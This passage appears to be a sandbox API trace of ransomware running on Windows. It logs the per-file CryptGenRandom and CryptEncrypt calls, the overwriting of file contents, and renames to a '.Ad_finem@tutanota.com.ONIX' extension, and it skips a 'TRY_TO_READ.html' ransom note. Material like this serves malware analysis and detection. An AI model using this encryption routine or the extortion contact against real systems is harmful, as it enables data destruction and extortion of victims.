ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf6e345a0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x4cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="InfoPathMUI.xml", cAlternateFileName="INFOPA~1.XML")) returned 1 [0097.592] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0097.592] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425080 [0097.592] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458638 [0097.592] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425080 | out: hHeap=0x410000) returned 1 [0097.592] GetLastError () returned 0x0 [0097.592] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x390 [0097.593] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0097.593] LockFile (hFile=0x390, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x4cf, nNumberOfBytesToLockHigh=0x0) returned 1 [0097.593] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0097.593] ReadFile (in: hFile=0x390, lpBuffer=0x530000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x530000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0097.594] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.594] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.595] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0097.595] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0097.595] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", dwFileAttributes=0x80) returned 1 [0097.595] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 79 [0097.595] GetProcessHeap () returned 0x410000 [0097.595] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10e) returned 0x467908 [0097.595] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" [0097.595] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0097.595] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=1231) returned 1 [0097.595] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x4cf [0097.595] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0097.595] GetProcessHeap () returned 0x410000 [0097.595] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x473050 [0097.595] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x473050*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x473050*, pdwDataLen=0x367f414*=0x100) returned 1 [0097.595] WriteFile (in: hFile=0x390, lpBuffer=0x473050*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x473050*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0097.597] WriteFile (in: hFile=0x390, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0097.598] WriteFile (in: hFile=0x390, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0097.600] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4cf) returned 0x4b6b68 [0097.600] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4cf) returned 0x4b7040 [0097.600] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.600] ReadFile (in: hFile=0x390, lpBuffer=0x4b6b68, nNumberOfBytesToRead=0x4cf, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b6b68*, lpNumberOfBytesRead=0x367f44c*=0x4cf, lpOverlapped=0x0) returned 1 [0097.600] SetFilePointer (in: hFile=0x390, lDistanceToMove=-1231, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.600] WriteFile (in: hFile=0x390, lpBuffer=0x4b7040*, nNumberOfBytesToWrite=0x4cf, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b7040*, lpNumberOfBytesWritten=0x367f44c*=0x4cf, lpOverlapped=0x0) returned 1 [0097.601] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b6b68 | out: hHeap=0x410000) returned 1 [0097.601] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b7040 | out: hHeap=0x410000) returned 1 [0097.601] UnlockFile (hFile=0x390, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x4cf, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0097.601] CloseHandle (hObject=0x390) returned 1 [0097.602] GetProcessHeap () returned 0x410000 [0097.602] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0097.602] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0097.604] GetProcessHeap () returned 0x410000 [0097.604] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0097.604] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0097.604] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0097.604] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449d98 | out: hHeap=0x410000) returned 1 [0097.604] FindNextFileW (in: hFindFile=0x48eab0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x73c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0097.604] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0097.604] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425080 [0097.604] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458638 [0097.604] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425080 | out: hHeap=0x410000) returned 1 [0097.604] GetLastError () returned 0x0 [0097.604] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x390 [0097.605] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0097.605] LockFile (hFile=0x390, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x73c, nNumberOfBytesToLockHigh=0x0) returned 1 [0097.605] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0097.605] ReadFile (in: hFile=0x390, lpBuffer=0x530000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x530000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0097.607] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.607] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.607] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0097.607] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0097.607] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1 [0097.607] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 73 [0097.607] GetProcessHeap () returned 0x410000 [0097.607] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x102) returned 0x467908 [0097.607] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" [0097.607] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0097.608] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=1852) returned 1 [0097.608] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x73c [0097.608] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0097.608] GetProcessHeap () returned 0x410000 [0097.608] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x473050 [0097.608] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x473050*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x473050*, pdwDataLen=0x367f414*=0x100) returned 1 [0097.608] WriteFile (in: hFile=0x390, lpBuffer=0x473050*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x473050*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0097.610] WriteFile (in: hFile=0x390, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0097.611] WriteFile (in: hFile=0x390, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0097.612] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x73c) returned 0x4b6b68 [0097.612] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x73c) returned 0x4b72b0 [0097.612] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.612] ReadFile (in: hFile=0x390, lpBuffer=0x4b6b68, nNumberOfBytesToRead=0x73c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b6b68*, lpNumberOfBytesRead=0x367f44c*=0x73c, lpOverlapped=0x0) returned 1 [0097.612] SetFilePointer (in: hFile=0x390, lDistanceToMove=-1852, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.612] WriteFile (in: hFile=0x390, lpBuffer=0x4b72b0*, nNumberOfBytesToWrite=0x73c, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b72b0*, lpNumberOfBytesWritten=0x367f44c*=0x73c, lpOverlapped=0x0) returned 1 [0097.613] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b6b68 | out: hHeap=0x410000) returned 1 [0097.613] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b72b0 | out: hHeap=0x410000) returned 1 [0097.613] UnlockFile (hFile=0x390, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x73c, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0097.613] CloseHandle (hObject=0x390) returned 1 [0097.615] GetProcessHeap () returned 0x410000 [0097.615] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0097.615] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0097.617] GetProcessHeap () returned 0x410000 [0097.617] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0097.617] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0097.617] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0097.617] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449d98 | out: hHeap=0x410000) returned 1 [0097.617] FindNextFileW (in: hFindFile=0x48eab0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30c1c230, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30c1c230, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30c1c230, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0097.617] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0097.617] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425080 [0097.617] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458638 [0097.617] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425080 | out: hHeap=0x410000) returned 1 [0097.617] GetLastError () returned 0x0 [0097.617] FindNextFileW (in: hFindFile=0x48eab0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30c1c230, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30c1c230, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30c1c230, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0097.617] CloseHandle (hObject=0x3cc) returned 1 [0097.617] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0097.618] GetSystemTime (in: lpSystemTime=0x530400 | out: lpSystemTime=0x530400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x25, wMilliseconds=0xe)) [0097.618] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x540000 [0097.618] GetWindowsDirectoryW (in: lpBuffer=0x540000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0097.618] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x540200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x540600, lpMaximumComponentLength=0x540608, lpFileSystemFlags=0x540604, lpFileSystemNameBuffer=0x540400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x540600*=0x9c354b42, lpMaximumComponentLength=0x540608*=0xff, lpFileSystemFlags=0x540604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0097.618] wsprintfW (in: param_1=0x530000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C9c354ca09c354b444c.lock") returned 86 [0097.618] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C9c354ca09c354b444c.lock" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0097.619] VirtualFree (lpAddress=0x540000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.619] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.619] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x90) returned 0x449d98 [0097.619] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0097.619] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4586c0 | out: hHeap=0x410000) returned 1 [0097.619] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47f608 | out: hHeap=0x410000) returned 1 [0097.619] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x435769e0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x30c1c230, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30c1c230, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48eaf0 [0097.619] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0097.619] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425080 [0097.619] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4586c0 [0097.619] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425080 | out: hHeap=0x410000) returned 1 [0097.619] GetLastError () returned 0x0 [0097.619] FindNextFileW (in: hFindFile=0x48eaf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x435769e0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x30c1c230, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30c1c230, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0097.620] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0097.620] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425080 [0097.620] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4586c0 [0097.620] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425080 | out: hHeap=0x410000) returned 1 [0097.620] GetLastError () returned 0x0 [0097.620] FindNextFileW (in: hFindFile=0x48eaf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5f356eb0, ftCreationTime.dwHighDateTime=0x1cbe576, ftLastAccessTime.dwLowDateTime=0x5f356eb0, ftLastAccessTime.dwHighDateTime=0x1cbe576, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x1861, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0097.620] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0097.620] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425080 [0097.620] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4586c0 [0097.620] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425080 | out: hHeap=0x410000) returned 1 [0097.620] GetLastError () returned 0x0 [0097.620] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x398 [0097.621] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0097.621] LockFile (hFile=0x398, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x1861, nNumberOfBytesToLockHigh=0x0) returned 1 [0097.621] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0097.621] ReadFile (in: hFile=0x398, lpBuffer=0x530000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x530000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0097.623] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.623] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.623] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0097.623] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0097.623] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1 [0097.623] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 73 [0097.623] GetProcessHeap () returned 0x410000 [0097.623] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x102) returned 0x467908 [0097.623] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" [0097.623] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0097.623] GetFileSizeEx (in: hFile=0x398, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=6241) returned 1 [0097.624] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x1861 [0097.624] 